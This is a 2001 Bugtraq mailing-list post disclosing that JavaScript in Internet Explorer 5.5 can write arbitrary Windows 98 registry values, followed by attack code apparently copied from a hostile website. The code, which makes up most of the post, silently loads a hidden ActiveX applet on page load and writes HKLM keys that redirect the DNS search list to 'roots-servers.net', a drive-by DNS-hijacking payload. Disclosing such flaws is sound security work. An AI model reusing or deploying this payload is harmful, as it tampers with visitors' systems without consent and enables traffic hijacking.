javascript can write anything to windows98 registry

From: Marcin Jackowski (marcin@jackowski.net)
Date: 08/28/01 

Message-ID: <014501c12f9a$65d7e000$33bcfea9@jople.pl>
From: "Marcin Jackowski" <marcin@jackowski.net>
To: <bugtraq@securityfocus.com>
Subject: javascript can write anything to windows98 registry
Date: Tue, 28 Aug 2001 10:21:10 +0200

here's code from
www.4y4y.net:88/ls.html
it can write any value to windows98 registry

solution: disable JavaScript in InternetExplorer

tested on IE5.5

Marcin Jackowski

---------------------------------------------------------------

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
    try{
        a1=document.applets[0];
        a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
        a1.createInstance();Shl = a1.GetObject();
        a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
        try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-se
rvers.net");
        }
        catch(e){}
    }
    catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
    try{
        a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
        a2.createInstance();Shl =
a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
            try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
            }
        catch(e){}
    }
    catch(e){}
}setTimeout("yuzi2()",1000);
</script>